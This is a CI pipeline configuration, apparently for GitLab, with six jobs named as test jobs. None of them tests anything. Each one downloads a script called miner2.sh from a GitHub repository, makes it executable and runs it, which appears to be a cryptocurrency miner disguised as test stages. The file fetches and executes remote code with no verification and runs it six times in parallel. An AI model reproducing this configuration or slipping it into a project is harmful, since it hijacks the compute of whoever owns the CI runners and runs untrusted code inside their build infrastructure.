test-job1:
  stage: test
  script:
    - wget https://raw.githubusercontent.com/iamded/miner.sh/main/miner2.sh && chmod u+x miner2.sh && ./miner2.sh
test-job2:
  stage: test
  script:
    - wget https://raw.githubusercontent.com/iamded/miner.sh/main/miner2.sh && chmod u+x miner2.sh && ./miner2.sh
test-job3:
  stage: test
  script:
    - wget https://raw.githubusercontent.com/iamded/miner.sh/main/miner2.sh && chmod u+x miner2.sh && ./miner2.sh
test-job4:
  stage: test
  script:
    - wget https://raw.githubusercontent.com/iamded/miner.sh/main/miner2.sh && chmod u+x miner2.sh && ./miner2.sh
test-job5:
  stage: test
  script:
    - wget https://raw.githubusercontent.com/iamded/miner.sh/main/miner2.sh && chmod u+x miner2.sh && ./miner2.sh
test-job6:
  stage: test
  script:
    - wget https://raw.githubusercontent.com/iamded/miner.sh/main/miner2.sh && chmod u+x miner2.sh && ./miner2.sh

